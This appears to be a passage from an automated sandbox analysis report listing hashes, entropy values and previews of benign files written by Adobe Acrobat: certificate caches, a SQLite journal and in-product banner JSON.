                                                                    SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                    MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                    SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                    SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                    SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):16928
                                                                    Entropy (8bit):1.2153152990587708
                                                                    Encrypted:false
                                                                    SSDEEP:24:7+t5PuqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+f:7M5mqLmFTIF3XmHjBoGGR+jMz+LhQ
                                                                    MD5:A26FB523B915333D073F6E700C376B29
                                                                    SHA1:928190650008AEDF7F305101CF0FACC37907853A
                                                                    SHA-256:714895AA9079258610231724EBD4C8136A80F7313FF1782EDFF86C980C882289
                                                                    SHA-512:5B2BEA73B16151D59373D48479F2A6FB2B55BB371296E3E769740C284BD87E7A8E2A7B31B6D3B0CA7BF8F749A12071D6A63C31E652FB0313DE461F6BA68E50A7
                                                                    Malicious:false
                                                                    Preview:.... .c......}.Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):69993
                                                                    Entropy (8bit):7.99584879649948
                                                                    Encrypted:true
                                                                    SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                    MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                    SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                    SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                    SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                    Malicious:false
                                                                    Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):893
                                                                    Entropy (8bit):7.366016576663508
                                                                    Encrypted:false
                                                                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                    Malicious:false
                                                                    Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):330
                                                                    Entropy (8bit):3.1414940076987787
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKfVlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:XVlMkPlE99SNxAhUeVLVt
                                                                    MD5:01991C77CFA38292FF1BE3B2E4AA6B17
                                                                    SHA1:879C52D6E3ED425E87296C8BBDECD6E4FFC0BA44
                                                                    SHA-256:144B0282CE80088B958FFBA4209C5867C75BD932F247AD6B67055D9658DD3ED1
                                                                    SHA-512:8576F3B21AE0821ADF9981E861BB0522939AC891642A369B0F5C814F726D1C5E1C7694A6C997FE0D7DD6BA2D82B5953D970251A609D7DE0A564F51CFE304190B
                                                                    Malicious:false
                                                                    Preview:p...... .........C.....(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):252
                                                                    Entropy (8bit):3.0155357938800775
                                                                    Encrypted:false
                                                                    SSDEEP:3:kkFklxE1fllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7lnklc:kKrxliBAIdQZV7I7kc3
                                                                    MD5:F3CF56B360A88C2D980BB70B10F393FD
                                                                    SHA1:9A104788C9524E1F2B7474808E560A9E76D412EA
                                                                    SHA-256:ED3D8F3611F008299E461475B5841D305D85AAADDA8155068A686190BA68B51F
                                                                    SHA-512:44E30E6B7FC948E256A12B7EB92F7EFB4E413AE02C215A064187AD3629A11A242FB7F80B9ED9C330E42338238242C567491C9E1D43899F2247C0EE1DAB5F4674
                                                                    Malicious:false
                                                                    Preview:p...... ....`...:.......(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.375430726619065
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJM3g98kUwPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGMbLUkee9
                                                                    MD5:5A6D08EB7425927A3C6ECFC51F49E963
                                                                    SHA1:F4A367A0C1CA3343FE8A10BCD1604928FF70F703
                                                                    SHA-256:812F05FE50423275B5CC448E7CED8927982C0FBD940F7CF326464755D5CA849A
                                                                    SHA-512:B5641385974FEA852AE22B217A6217EB4A4EA1449D2CEAA6E5CA496B49415F10ECF9D107EAE64023BC787D7A39B46480F5425C290B60E5818FC20F7BFCBCDD7B
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.324267342271105
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfBoTfXpnrPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGWTfXcUke6
                                                                    MD5:D228DD2220BC43DDB499E59129DB1B89
                                                                    SHA1:DC0045199CBA31E1C81D3EA7C11E5E0CEF298F86
                                                                    SHA-256:F0A91E1439C97599AD6E377B32444E9F94917698834B57D78C7C5606C696F8D3
                                                                    SHA-512:862C4EBBCB840540CEB5CC869800E31E985E7B13B1349B020C62A5B96004BFC415FF5E2D887C6DF96B5902DB2461E10A8B053F6FEBACA9B9F2561C2C0414DFC7
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.301388783813682
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfBD2G6UpnrPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGR22cUkee9
                                                                    MD5:42D4B59D1988717F8B12E173C3380FF0
                                                                    SHA1:E72D5C193C2434B2429918EAB860F317D46FAA4D
                                                                    SHA-256:E31369A43EDB376A257843B598F7E15D94AB0A98070EA29E182CCABA538E11B7
                                                                    SHA-512:ED932F5004825C87B589534207C64FF518CA6AC70963A768E9689EB57ABFE2B52453C8FBE1B55172E5FBF62AF96793C652085077FAF7C23AC5AD68F1474EED0C
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):285
                                                                    Entropy (8bit):5.364234330809248
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfPmwrPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGH56Ukee9
                                                                    MD5:CDC5074ED4EB7C6DAEF310C6FE91B364
                                                                    SHA1:F0EA93FC11B646320EE9D648DACBD831C5A5B34F
                                                                    SHA-256:556327E461D9E0B385785786C7272E8DA2D857C115EF708A308C892B87B93051
                                                                    SHA-512:B0D9FE46D04EE98D34BCFF7750238288737C0CD44A6E95F1FBCFF1FDF9095E41787577363EBDB95748849C667A2FEEB9333F56FFDC882089074267D2F078193D
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.324945669998854
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfJWCtMdPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGBS8Ukee9
                                                                    MD5:B2D29895EE1C63FCF5A564B54CD6122D
                                                                    SHA1:B0A4B2FFAA0C8C969477AB34353F70A54F9622F5
                                                                    SHA-256:ADC22BB3D1387E1D41318BFC95E2184562993B266FC2718325C1CB6C5965AA6E
                                                                    SHA-512:FB976180F1393E8C500E93DCE68B0F88E705DB7DC518DB3E03EEE825B64FF5C14F8989002B5CADA896CB0909642C9137A43633E59ED3C6E8D1E375288EDAE99C
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.3104381076820655
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJf8dPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGU8Ukee9
                                                                    MD5:2E1C85D289C37A5AD311237B3B065E03
                                                                    SHA1:31D5EC92C14F6B3306A51F1BE86E8DF4AA0EB1BF
                                                                    SHA-256:C4EFCAE5089D54A35F41ABD954E20BED304EFC881699786D89851F73848D28B1
                                                                    SHA-512:44F149DC9F7994AAE2A90FACA1E1D368553AC02B8CEA7B7E6E8B9425BCF2F74E68D04E8231CB01C8AA8C0502794F80930044D3094B196E9D16B0D6B96432B5C1
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.312964921006468
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfQ1rPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGY16Ukee9
                                                                    MD5:B208B4CE1377D43EC5B6BE9D7D951655
                                                                    SHA1:031901887396485FBF9ABF37CBAEC026303F97ED
                                                                    SHA-256:2E317360F5466FEF9511F50FA8C46DF325AE82FAAEC802A5CF8393CFCF20A8EC
                                                                    SHA-512:5FE74A4B61F9DB43A98EF428D19984996DA973D406863626BF42A2DEDA8D908D21607CF648A857BBFB4AA78EB5105C80CB4C3ED3E7FE9EA19CF93E006E2EE40F
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.320160606260754
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfFldPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGz8Ukee9
                                                                    MD5:598972BE66FC4ACCAB0DFF8B3114C7E8
                                                                    SHA1:F0CA1403DF7E160DDA880C10B6D3DFDE6EC7D2D6
                                                                    SHA-256:1B2CD347903C89E1A3C06810CEB69068415DECBFB1F075C45891065DB189BF44
                                                                    SHA-512:5A173B101CFD9A975C44ECA276210E98779C91BFE07A36A6A04D86C32E219D56551AC6C3900967AE028F7B230EE322C236312CCDB23D546A9CB0BA829990CD4D
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1372
                                                                    Entropy (8bit):5.737511192224572
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6Xm29U1caAKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJN0q:YvF29U1tAEgigrNt0wSJn+ns8cvFJ9
                                                                    MD5:8274BF24045E42C22F8D7F178751205D
                                                                    SHA1:F51A9193F3482C6138EC0FE504D3F905768C6D68
                                                                    SHA-256:7960D9150D435F59E9228B01DAEAB73D6176459FD8ABC924D6F33E3957F07E58
                                                                    SHA-512:64A250AFFF871837593847AA6D0484696FB1D33FFCBD2C6229729F4C0968ED4DB6F19AA79CAC2893E322A8B230ADFF9F71039A9332930A8B6B6E9106152AA5CC
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.318277920529242
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfYdPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGg8Ukee9
                                                                    MD5:10F50F2D7808980255C7AAD8353ABC0D
                                                                    SHA1:FE3C748CFBAB7439EDF936ADD34AF99996A79E4F
                                                                    SHA-256:E3BE096A4D7A8FB6A9450A4747BB42E44D1E483A778136EA3659FE9181D08DEA
                                                                    SHA-512:D57E8C69A46887E179F7D555A830A5A41D5145B77D2326FA0022D2735DF719FBB3CCA88844930F49C5DCAA9B37BA455AA393E52BFEA05CF729A102FDE97521DC
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1395
                                                                    Entropy (8bit):5.772393955751041
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6Xm29U1caPrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJN8q:YvF29U1tPHgDv3W2aYQfgB5OUupHrQ95
                                                                    MD5:68441BB5DB56F1CBC724220AD93412B7
                                                                    SHA1:2A69FE9468C77B47D6B89B6FD830F703897AFA37
                                                                    SHA-256:725540E2B390D674A50C2156473BC48B195CEAAE42CBFB239745293F60899F66
                                                                    SHA-512:C2712AB940D6C93BCFCBE415778AB1DEB73DB66A3326E0020C236521F94BC699222E9A575D9AEB56A54740057DE8B74736534447BBF59C849140A508E1D959EA
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.3016993967561685
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfbPtdPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGDV8Ukee9
                                                                    MD5:8ABC4BFC2261C6FC2827EEF17BD59BCF
                                                                    SHA1:19385A7FE10467E70020D333D3D527DA1808875B
                                                                    SHA-256:E73B620E8B72CF64D4645A61EC04CF9B5557FA7B5E823AA74A624567249417BC
                                                                    SHA-512:0F5C5C0EDF8C2316F1D26482E6EC04D0B1A6DF9FE9D1EE12F5C5088900CC4C23D0937388B2E708420626FE8BBE884133A6B46A5728049D0D29BBD47E2C70F573
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):287
                                                                    Entropy (8bit):5.305019330174085
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJf21rPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYG+16Ukee9
                                                                    MD5:19F5338BBE80D50C2F2FD99008009A2F
                                                                    SHA1:1B477EF3EFA3215FD60B00D2C5E1D8B9E89617FD
                                                                    SHA-256:8682D877A09A0687B8645A05C8A9BF0C87B2C3328B9D21C0D3C3F4FB9F705ADD
                                                                    SHA-512:50BFF557682628668EEDB6BF146DAA2144AF4BBCBD12DB598940804AF98181D069255017C7A2C6DCF63FCC22D88BA1CACF7EDD823770BCC95B0799B3EAE60204
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.3248192312131675
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfbpatdPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGVat8Ukee9
                                                                    MD5:F17A0FD883B792E7325587DEA35DF366
                                                                    SHA1:1744D4D7B6175A794090F8B1399F079EDA958830
                                                                    SHA-256:6D9538DD20942EE0533B404A17A7E4D32D0A5C5816868D64C7ACD6C02506C66F
                                                                    SHA-512:FD4285B8F6EB3AB6B9EF507399BC83EE9DF687B91E54163C1F039E2529D7D941E0823C4D25F31C8CB4ECB71968381722C23B8DE4978339D2BDFB5D0837E5372A
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):5.279893402279125
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXHG2BTt73+5IRR4UhUR0YRcXq3oAvJfshHHrPeUkwRe9:YvXKXm2Jt73+WRuUhU1caYGUUUkee9
                                                                    MD5:ACA9C760D98D54616EABF3BD4D7D1DFD
                                                                    SHA1:FE62D71713D7118CBE3C4419F408B8B55031507E
                                                                    SHA-256:ABA848CA5D28B44ADBA14368FFE52D820F25FBBF27762227CDEB1BFB5DF9DEAD
                                                                    SHA-512:C03932048C4F05EE526E24FB6E826202F2FCBECFC238B65433F3F3582E9DED381F444A1798B3557F6E0A54981A3913D4D0D378CC89C72BFC30984E25292B1554
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
